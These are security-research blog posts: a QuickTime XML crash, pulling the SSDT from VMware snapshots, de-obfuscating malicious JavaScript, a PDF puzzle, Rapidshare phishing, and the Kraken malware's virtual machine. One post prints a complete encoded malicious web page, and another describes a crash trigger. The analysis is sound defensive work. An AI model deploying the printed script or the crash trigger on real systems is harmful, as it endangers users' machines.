QTPlayerSession.xml (located under %USERPROFILE%\Application Data\Apple Computer\QuickTime\) stores various user settings. Among other things, it holds a list of favorite movies and a list of recently opened files. These lists are called FavoritesListName and MRUListNameWithURLs; here is a possible definition:



There’s a *key* definition followed by an *array* element. Inside the *array* tags QuickTime saves some values.
A single item is made of two lines: the first one (“test 1”) is the name shown by QuickTime, while the other (“C:\Programs\QuickTime\Sample.mov”) is the path of the file. No matter what you write inside the string tag, QuickTime doesn’t check whether the text is valid.
When QuickTime is fully loaded you can see the items under the *favorites* and *open recent* menu items (I don’t know the exact English names because I have an Italian version of the software).

When QuickTime starts, it retrieves all the information it needs by parsing the xml file. It scans the MRUListNameWithURLs values first, then the FavoritesListName list. Like every parser, it scans the file tag by tag, saving the content of each line in memory. Once all the necessary structures are in memory, the program retrieves the stored information and puts it in the right places: *recent opened files* and *favorites files*.

QuickTime takes the values to put inside the two menu items running this piece of code:
1: movzx eax, word ptr [esi]
2: lea eax, [esi+eax*4+4]
3: lea eax, [eax+edi*4]

After the instruction at line 2, the EAX register points to a series of DWORD values; each DWORD is a pointer to a single piece of information to retrieve. EDI is the index, because the DWORDs are taken one at a time. When MRUListNameWithURLs is checked I have something like:
EAX -> 68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01 0D F0 AD BA AB AB AB AB
0134D268 points to a structure containing "Another test"
0134D308 points to a structure containing "C:\abc.mov"
0134D3D8 points to a structure containing "The last one"
0134D450 points to a structure containing "path"

The bytes above are stored in a block of memory allocated at runtime with the RtlAllocateHeap function. Every time the snippet above is executed the program takes a single string, depending on the index value. The items retrieved from the xml file are shown under the right menus when QuickTime is fully loaded. As I said before, there are two entries for every file, so QuickTime always executes the code twice per item. The last 8 bytes pointed to by EAX are not related to any string, they are just old bytes.
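To make the dump easier to read, here is a small Python sketch that splits it into little-endian DWORDs, the same way the `lea eax, [eax+edi*4]` step walks the table. The function name `entry` is mine, not something taken from QuickTime. Read this way, the trailing 8 bytes come out as 0xBAADF00D and 0xABABABAB, which look to me like the fill patterns the Windows heap uses when a process runs under a debugger; that is my reading of the dump, I haven't verified it inside QuickTime.

```python
import struct

# Bytes copied from the dump above (the memory EAX points to).
dump = bytes.fromhex(
    "68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01 "
    "0D F0 AD BA AB AB AB AB"
)

def entry(table, index):
    """Return the little-endian DWORD stored at table[index * 4]."""
    return struct.unpack_from("<I", table, index * 4)[0]

pointers = [entry(dump, i) for i in range(len(dump) // 4)]
for i, p in enumerate(pointers):
    print(i, "%08X" % p)
```

The first four values are the pointers listed above (0134D268, 0134D308, 0134D3D8, 0134D450); indexes 4 and 5 are the leftover bytes.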

Can you understand what I’m trying to say?
The xml file is updated by QuickTime, but you can edit it. The problem occurs when you modify FavoritesListName and MRUListNameWithURLs a little, using something like:



You can modify FavoritesListName in the same way. Of course you can define some more items. The point is that QuickTime is not able to handle an item defined without both of the necessary lines (name to display and path of the file) inside MRUListNameWithURLs and FavoritesListName; writing 1, 3, 5, 7 (or 9…) lines between the *array* tags always gives the same result, a crash.
Why? Well, because the program takes the next 4 uninitialized bytes as a pointer, and you don’t know what they are.
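If you want to check a file before QuickTime does, a rough sketch like the one below counts the string entries inside every *array* element and reports the ones with an odd count. The sample XML is hypothetical: I only assume *key*, *array* and *string* elements as described above, the real file has more around them.

```python
import xml.etree.ElementTree as ET

def unpaired_arrays(xml_text):
    """Return the positions of <array> elements holding an odd number of <string> children."""
    root = ET.fromstring(xml_text)
    bad = []
    for pos, array in enumerate(root.iter("array")):
        if len(array.findall("string")) % 2 != 0:
            bad.append(pos)
    return bad

# Hypothetical sample: three lines instead of two complete name/path pairs.
sample = """<dict>
  <key>MRUListNameWithURLs</key>
  <array>
    <string>Another test</string>
    <string>C:\\abc.mov</string>
    <string>The last one</string>
  </array>
</dict>"""

print(unpaired_arrays(sample))
```

An empty list means every array holds complete name/path pairs.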

I could be wrong, but I don’t think it’s possible to exploit it. It’s a bug that can lead to a sort of denial of service, because the crash occurs during initialization. If your copy crashes, try checking the xml file.

Some time ago I blogged about Vmware snapshots, introducing a way to recognize hidden files by simply comparing two snapshots. I wanted to extend my research on the subject a little bit more, but I didn’t. In the last few days I got the opportunity to put my hands on some snapshots again. I had nothing specific in mind, but I was surprised by some coincidences. Look at the information below:

80544bc0: 804fc624 00000000 0000011c 804fca98
80544bd0: bf995ba8 00000000 0000029a bf98f5f8
80544be0: 00000000 00000000 00000000 00000000
80544bf0: 00000000 00000000 00000000 00000000

00544BC0: 24C6 4F80 0000 0000 1C01 0000 98CA 4F80 $.O...........O.
00544BD0: A85B 99BF 0000 0000 9A02 0000 F8F5 98BF .[..............
00544BE0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00544BF0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

The first 4 lines are taken from Windbg while I was debugging an XP SP1 virtual machine running under Vmware; the last 4 lines are taken from a saved Vmware snapshot (same OS of course).
Do you see anything useful? These are KeServiceDescriptorTable[0],[1],[2],[3] and of course they have the same bytes, but there’s something else. There’s a connection between the addresses in the first listing and the offsets in the second one: just remove the first 2 digits from the address. Do you see it? Look here: 80544BC0/544BC0, 80544BD0/544BD0, 80544BE0/544BE0, 80544BF0/544BF0.
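In code the relation looks like this. It is only a sketch of what I observed on these snapshots: `snapshot_offset` and `read_dwords` are names I made up, and masking the top byte is just another way of saying "remove the first 2 digits".

```python
import struct

def snapshot_offset(kernel_va):
    """Drop the top byte of the kernel address (80544BC0 -> 544BC0)."""
    return kernel_va & 0x00FFFFFF

def read_dwords(raw):
    """Interpret raw snapshot bytes as little-endian DWORDs."""
    return list(struct.unpack("<%dI" % (len(raw) // 4), raw))

# First row of the snapshot dump above.
row = bytes.fromhex("24C6 4F80 0000 0000 1C01 0000 98CA 4F80")

print("%X" % snapshot_offset(0x80544BC0))
print(["%08X" % v for v in read_dwords(row)])
```

The decoded DWORDs are the same values Windbg shows on its first line: 804fc624 00000000 0000011c 804fca98.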

It seems the kernel memory is stored inside the snapshot. That’s not entirely true: only a part of the kernel memory is stored inside a Vmware snapshot. All the KeServiceDescriptorTable entries are present btw.
The SSDT is inside the snapshot I have and it’s complete; the SSDT Shadow seems to be inside the snapshot too, but there’s no obvious connection between kernel memory and snapshot addresses, and it’s not complete (it needs some more research btw).

Is it only a coincidence? I tried with some XP machines and the result is the same: it’s possible to obtain real SSDT information. According to Kayaker’s test it should work on win2k too (I don’t remember the service pack he was using…).

With this new information it’s pretty easy to code an SSDT revealer. I gave it a try and here is the result:

You can use the program to display SSDT entries and to find out modified entries too by simply comparing an original snapshot with another one.

To retrieve information from a snapshot you have to provide the address of KeServiceDescriptorTable[0] (something like 80544BC0, no “0x” prefix), and you have to select the OS of the virtual machine. After that you can:
1. save an untouched SSDT using the button labelled “Create untouched SSDT”
2. retrieve SSDT information from a snapshot by simply pushing the button labelled “Get snapshot SSDT”. Checking “Load untouched SSDT data” you can compare the original table (previously saved) with the one from the snapshot you’ll select. If a service has been changed you’ll read the word “YES” in the last column.
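The comparison behind the “YES” column is nothing more than an entry-by-entry diff. Here is a minimal sketch of the idea, not the code of my tool; the addresses in the example are invented.

```python
def modified_entries(original, snapshot):
    """Return (index, original_address, snapshot_address) for every service whose address differs."""
    return [
        (i, a, b)
        for i, (a, b) in enumerate(zip(original, snapshot))
        if a != b
    ]

# Hypothetical tables: service number 1 has been redirected.
clean = [0x804FC624, 0x805A1234, 0x805B5678]
hooked = [0x804FC624, 0xF8A01000, 0x805B5678]

for index, old, new in modified_entries(clean, hooked):
    print("service %d: %08X -> %08X" % (index, old, new))
```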

I took the name of the services from this table: http://metasploit.com/users/opcode/syscalls.html
I can’t test all the OS, if you find one or more errors drop me a mail.

Following this method it’s also possible to get the list of the running processes/modules, more about this later.

[Screenshot: SSDT from snapshot]

Malicious javascripts out there are sometimes encrypted using commercial tools or, most of the time, using home-made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no, it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder is able to show the original code in a few milliseconds, and when it fails you can use your brain… not as fast, but it will solve the puzzle for sure.
Even if you are able to fool one or more automatic decoders, it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awful indeed. I wanted to see the script code and, as always, I tried using some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the two scripts into one without luck (it should work but I failed, don't know why...). The few decoders I tried were not able to give me a good result. I didn't search the net for more decoders; I decided to figure it out myself.

The second script starts with lW4("MGN and ends with the O\=m") character sequence. It looks like a generic call, where lW4 is the name of the function and the string inside the quotes is the parameter, a very long string. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right track: the line above looks very much like the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains useless declarations (jL0 is declared two times, you can remove the first one), useless variables (nB73 is not used) and useless strings (you can remove strings like "0u\%N\{\{I\{\\" or 0.1261199). It's pretty easy to remove them; the result I got is shown below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");
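For readers who prefer Python, here is how I read the cleaned-up function: a substitution from one alphabet to another, with the lookup alphabet rotated by one character after every call. That rotation is probably why the second script can't be decoded on its own, since it depends on the state left by the first call (my guess, I didn't test it further). The tiny alphabets below are invented for the example, they are not the real jL0 and yU90.

```python
def make_decoder(lookup, plain):
    """Build a decoder that mimics lW4: substitute, then rotate the lookup string."""
    state = {"key": lookup}

    def decode(text):
        key = state["key"]
        out = "".join(
            plain[key.index(ch)] if ch in key else ch  # unknown characters pass through
            for ch in text
        )
        state["key"] = key[1:] + key[0]  # jL0 = jL0.substring(1) + jL0.charAt(0)
        return out

    return decode

# Toy alphabets (hypothetical, much shorter than the real ones).
decode = make_decoder("bca", "abc")
first = decode("bca!")
second = decode("bca!")
print(first, second)
```

The same input gives two different outputs because the key has moved between the calls.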

Two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code; to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest way to see the code. If you read EvilCry’s post you should know the content of the first decrypted code, the other one is:

Just yesterday I had the opportunity to take a look at a sort of obfuscated Javascript code I have never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{
...
},
cookieName:'feadcbhg',
getFrameURL : function()
{
...
},
...
};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty, since no special initialization is needed. Just after the class definition there are two more lines: a new KyD object is created and its “install” method is called.

For me it’s quite uncommon to see a class declaration inside a malicious script; I’m used to seeing Javascript code written in a procedural style. Anyway, this is not a problem of course. The problem arises when looking at the declared methods. It’s often easy to understand a Javascript function from the source code, but not this time. Look at this snippet taken from one of the methods declared inside the KyD class:

Are you able to tell me the content of “o” in a few seconds? Even if you know how to handle s you’ll need more than a few seconds to solve the puzzle.
How do you work out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexps.

How can regexp be used to obfuscate a string?
The string s is composed of 3 parts: two of them are obfuscated substrings, while the other one is obtained from getFrameURL, another method of the KyD class.
The substrings have a replace method applied; in this specific case the method is used to search for characters with a regular expression and replace them. The method is normally used to replace some characters in a string with other characters:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var s = "Say Hello";
document.write(s.replace(/Hello/, 'Ciao'));

The output will be “Say Ciao”, pretty easy. It’s also possible to use some more options, i.e.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, '')

The g option is present and the new string is empty, which means part of the string will be cut away. Which part? The string to find is defined as a regular expression: every character listed inside the square brackets (‘[’ and ‘]’) will be replaced with the empty string. Removing the specified characters from the substring you’ll obtain the de-obfuscated substring:
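The original substring isn't reproduced here, so as a stand-in here is the same trick in Python on a string I made up. `re.sub` with an empty replacement does what the Javascript replace with the g option does; only the character class is taken from the snippet.

```python
import re

# Same character class as in the Javascript snippet: % ) @ Q I
JUNK = re.compile(r"[%\)@QI]")

def deobfuscate(text):
    """Remove every junk character, like replace(/[%\\)@QI]/g, '')."""
    return JUNK.sub("", text)

# Hypothetical obfuscated string, not the one from the real script.
obfuscated = "h%tQt)p:@//I"
print(deobfuscate(obfuscated))
```

Note that this only works if the clear text never contains one of the junk characters, which is the weak point of the trick.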

Now I can decode all the strings obtaining the original script!
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.

There was a challenge today at Didier Stevens’s blog. It’s a pdf puzzle; the goal is to find the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
Passphrase is not a sequence of ‘X’ for sure. How to find it out?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with notepad reveals the complete structure of the pdf file. The phrase is not readable inside the file; after a closer look at the file I noticed these lines:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

This is the definition of an object, as you can see it’s encoded using ascii85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.
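If you don't have a decoder at hand, Python's standard library has one. The sketch below is a small helper (the name `decode_pdf_ascii85` is mine) that strips the `~>` end marker used by PDF streams before calling `base64.a85decode`. Since the stream above is truncated, the example encodes and decodes a sample text of my own instead of the real data.

```python
import base64

def decode_pdf_ascii85(stream):
    """Decode an ASCII85 stream, tolerating the '~>' end-of-data marker."""
    data = stream.strip()
    if data.endswith(b"~>"):
        data = data[:-2]
    return base64.a85decode(data)

# Round trip on a made-up content stream (not the one from the puzzle).
plain = b"BT (some text) Tj ET"
encoded = base64.a85encode(plain) + b"~>"
print(decode_pdf_ascii85(encoded))
```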

Is it really necessary to use an ascii85 decoder?
There are two suspicious snippets inside the file indeed; the first snippet is the one you see above, and the other one is:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

They are two almost identical objects. Only a few bytes differ in the encoded strings. The first and the last part of the encoded strings are the same, which means they contain the same operators; e.g. if the objects are used to display a text string, they can have the same coordinates.

Ok, I have two streams but only one will be shown. Who decides what to display?
A pdf file contains a Cross Reference table which is used to define all the objects that are inside the file. A table is something like:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 objects defined. Checking each object offset (the number in the first column) you’ll find out that only one stream is defined. The other one is not defined in this table because there’s another Cross Reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n

It’s pretty obvious now, the second stream (text with xxx) will be written over the first one (text with password).
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
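The same cut can be done with a few lines of Python instead of a hex editor. This is just a sketch of the step described above: it keeps everything up to and including the first “%%EOF” and drops the rest. The function name and the fake file content are mine.

```python
def strip_incremental_updates(pdf):
    """Keep the file up to the first %%EOF marker, dropping later updates."""
    marker = b"%%EOF"
    end = pdf.find(marker)
    if end == -1:
        raise ValueError("no %%EOF marker found")
    return pdf[: end + len(marker)] + b"\n"

# Fake two-revision file, only to show the effect.
fake = b"%PDF-1.1\noriginal body\n%%EOF\nupdated object 5\n%%EOF\n"
print(strip_incremental_updates(fake))
```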
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!

Lunch break ends now…

There are a lot of online storage services around the net, private or public. With this kind of service it’s pretty easy to save/share personal data. These services are heavily used, especially the ones that let you share files. They offer a free service (often with some sort of MB limit) and a paid service (no limit). I never tried uploading a file, but I sometimes download files using Rapidshare, the most popular one I think.

Like every paid service it’s prone to phishing/fraud. I stumbled on a phishing site just today when I wanted to download an archive. Normally you click on a link and the initial Rapidshare page appears. Not this time.

The Rapidshare’s link was obscured using ProtectLinks. The address of the archive appears like: “http://protect-links.com/_a_number”. They simply assign a number to a specific web page displaying the content of the web page in this way:

It’s an empty page with the definition of an iframe at the end. The iframe tag is used to create an inline frame that contains another document. You can set one or more attributes (frameborder, height, name, width and src); I’m interested in the src attribute only. src defines the url of the document to show inside the iframe. From what I have seen, that’s how protect-links protects a web page.

This is only one of the services available around the net. In general, I don’t know why people need to protect a page with this kind of services btw.

Anyway, how to protect a rapidshare link? A classic rapidshare link looks like:
http://rapidshare.com/files/_a_number_/_filename_
A protected link declared inside the src attribute looks like:
src="http://_server_name_path/?link=_original_url_"
_original_url_ is the parameter passed to the php page and it represents the original rapidshare link.
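A quick way to see where such a frame really points is to split the src value and look at the host name. The sketch below uses only `urllib.parse`; the example url and the helper names are invented, I'm not reproducing the real phishing address.

```python
from urllib.parse import urlparse, parse_qs

def original_url(src):
    """Return the value of the 'link' parameter, or None if it is missing."""
    values = parse_qs(urlparse(src).query).get("link")
    return values[0] if values else None

def is_rapidshare(url):
    """True only when the host itself is rapidshare.com (or a subdomain of it)."""
    host = urlparse(url).hostname or ""
    return host == "rapidshare.com" or host.endswith(".rapidshare.com")

# Hypothetical src attribute in the form shown above.
src = "http://example.invalid/path/?link=http://rapidshare.com/files/123/file.rar"

print(original_url(src))
print(is_rapidshare(src), is_rapidshare(original_url(src)))
```

The link parameter looks legitimate, but the page that asks for your login is served by the other host.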

Trying to download the file I got this page:

The image above represents an error message, it’s generally displayed when you don’t have a premium cookie saved on your system. This is not the common page I see when I want to download a file. Normally, the original page contains two boxes and it lets you decide to use a free or a premium service. Hitting the premium button without a premium cookie you get this kind of error message.

The page is well defined, the design is like the original one but it’s a fake page. Inspecting some menu items you’ll see that they don’t have the same initial part of the url, they point to two different servers.
Anyway, if you are a registered premium user and you see the error message you simply use your account to login… that’s the problem, when you hit the login button you won’t see anything else than a white page. The result is obvious, your data are now property of someone else.

Can you understand why some people need to protect the link? Well, when a link has been protected you can’t see the original url… and you don’t know where you are sending your login details. This is an unfair use of the protector service for sure.

What to do to protect ourselves from this kind of fraud?
There’s a security advice at rapidshare.com, part of the text reads: “Generally you should never enter your login information on any websites other than rapidshare.com. Your account information would most likely be stolen.”. That’s a good hint to follow!

Kraken is the word of the month for sure, but it has nothing to do with the beast from a nice old book written by Jules Verne, Twenty Thousand Leagues Under the Sea.
The word refers to a family of malware, something like the Storm trojan but with much more strength. Kraken seems to have been around since August 2006, but until today I had never heard about it. Some days ago I read an article about it, the interesting part is here:
“One somewhat interesting feature of the code is that the binary is not packed, as many malware binaries tend to be. However, Royal said that the code does have some other forms of obfuscation that make it difficult to analyze completely.”. I decided to look at it.

I’m not going to give out a detailed explanation about the sample I’m working on (MD5 = 592523a88df3d043d61a14b11a79bd55), but I’ll spend some words on the “forms of obfuscation” used by the malware.

Detectors are not able to recognize any specific packer/protector. The file is not packed, but from the first lines of code it’s pretty easy to understand that some sort of obfuscation/encryption was included inside the file. I didn’t find interesting imports/strings, so I tried running the malware. Just to be sure to retrieve some useful information I started logging all the APIs called by the malware.
The malware calls some nice functions. Almost all the code of the binary file is decrypted at runtime. The malware spawns one file and deletes itself; you can spy on the decrypted code, but I didn’t get anything useful from it. The best thing to do is to look at the code, trying to identify a general obfuscation scheme or a decryption routine. Don’t think to trace the entire exe, it’s madness!

In a case like this one, if you see a light over your head you are lucky, otherwise you can step and look at each instruction for eternity. I was lucky… the real code has been hidden behind a virtual machine. I’m not a virtual machine expert for sure, I have only read some articles about this kind of protection.
I won’t rebuild the entire machine, I’ll only give out my findings. If you think they are wrong and/or you want to add some more information about the virtual machine I’ll be happy to see a comment from you.

Like every virtual machine out there, after a little initialization it goes into a semi-infinite loop that starts at 4012DA. It simply selects a virtual machine instruction and jumps to the code to run. There are a lot of instructions inside the loop; skipping the junk code you can see the snippet used to select (and then jump to) the next instruction to execute:

004012E4 MOV AL,BYTE PTR DS:[ESI-1] // Byte pointed by esi-1 decides everything
004012F3 ADD AL,BL
0040F807 DEC AL
004103D9 DEC ESI // Shift to the next byte
004103E7 ROL AL,2
004103F7 DEC AL
0040F590 XOR AL,0CF
0040F594 SUB AL,6B
004104A6 ADD BL,AL
004104AF MOVZX EAX,AL
004104B7 MOV ECX,DWORD PTR DS:[EAX*4+40FABB] // EAX = index of the selected instruction
004104C6 NOT ECX
0040129C ROR ECX,1C
00410213 SUB ECX,4DCBE90C
0041021F ROL ECX,7
00410229 INC ECX
0041070D BSWAP ECX
00401195 ADD ECX,5E1E81EF
0040119C XOR ECX,77B911BC
004011AE NOT ECX
0041071B ADD ECX,60334BE6 // ECX = address of the selected instruction
0040FFF3 MOV DWORD PTR SS:[ESP+48],ECX
0040FFFB PUSH DWORD PTR SS:[ESP+48]
0040FFFF RETN 4C // Go to the selected instruction

Everything starts from the value stored inside the buffer pointed to by (esi-1). The buffer contains a series of bytes that are used to select the virtual machine instruction to execute (they are also used to retrieve one or more of the vm_instruction’s operands). The new value stored inside EAX (obtained after some minor operations) is used to retrieve a dword value: EAX is the index into the vector that starts at 0x40FABB. As you can see from the code above, the dword is then used to obtain the address of the vm_instruction to execute.
Unlike a classical virtual machine this one doesn’t have a clear Instruction Table; looking at the dead listing in your favorite disassembler you won’t see the address of every single vm_instruction. The Instruction Table has been encrypted and the first entry is located at 0x40FABB (there are 256 entries).
The virtual machine has 16 registers (from r_0 to r_15), which can be used to store byte, word or dword data. The EDI register points to the first one; the registers are stored in memory consecutively from r_0 to r_15.
The virtual machine has a stack with a fixed size, and the EBP register contains the vm_esp value. After almost every push vm_instruction there’s a stack overflow check. The alignment is two bytes: “push byte_value” is not allowed, and to push a single byte the virtual machine extends the byte to a word value.
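To decode the Instruction Table without stepping through the loop, the dispatcher listing above can be transcribed almost line by line. The Python below is my transcription of that arithmetic, nothing more: the function names are mine, and the BL value used as rolling key has to be taken from the debugger because its initial value is not in my notes.

```python
MASK32 = 0xFFFFFFFF

def rol(value, count, bits):
    """Rotate value left by count inside a register of the given width."""
    count %= bits
    mask = (1 << bits) - 1
    return ((value << count) | (value >> (bits - count))) & mask

def ror(value, count, bits):
    """Rotate value right by count inside a register of the given width."""
    return rol(value, bits - (count % bits), bits)

def bswap(value):
    """Reverse the byte order of a 32-bit value."""
    return int.from_bytes(value.to_bytes(4, "little"), "big")

def decode_index(opcode_byte, bl):
    """Turn the byte at [esi-1] into a table index; returns (index, new_bl)."""
    al = (opcode_byte + bl) & 0xFF    # ADD AL,BL
    al = (al - 1) & 0xFF              # DEC AL
    al = rol(al, 2, 8)                # ROL AL,2
    al = (al - 1) & 0xFF              # DEC AL
    al ^= 0xCF                        # XOR AL,0CF
    al = (al - 0x6B) & 0xFF           # SUB AL,6B
    bl = (bl + al) & 0xFF             # ADD BL,AL
    return al, bl

def decode_handler(entry):
    """Turn an encrypted table dword into the address of the vm_instruction."""
    ecx = ~entry & MASK32             # NOT ECX
    ecx = ror(ecx, 0x1C, 32)          # ROR ECX,1C
    ecx = (ecx - 0x4DCBE90C) & MASK32 # SUB ECX,4DCBE90C
    ecx = rol(ecx, 7, 32)             # ROL ECX,7
    ecx = (ecx + 1) & MASK32          # INC ECX
    ecx = bswap(ecx)                  # BSWAP ECX
    ecx = (ecx + 0x5E1E81EF) & MASK32 # ADD ECX,5E1E81EF
    ecx ^= 0x77B911BC                 # XOR ECX,77B911BC
    ecx = ~ecx & MASK32               # NOT ECX
    ecx = (ecx + 0x60334BE6) & MASK32 # ADD ECX,60334BE6
    return ecx
```

Feeding the 256 dwords found at 0x40FABB to `decode_handler` should give the address of every vm_instruction, assuming I copied the constants correctly.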

Is there a cmp/test instruction inside the snippet? Is there a reference to a vm_eip register? It seems this virtual machine doesn’t need them. vm_eip is replaced by (esi-1); it’s not an eip per se but it *guides* the virtual machine. I don’t have all the vm_instructions in my notes, but I think there are no direct cmp/test instructions. They don’t seem to be included in the virtual machine, strange.

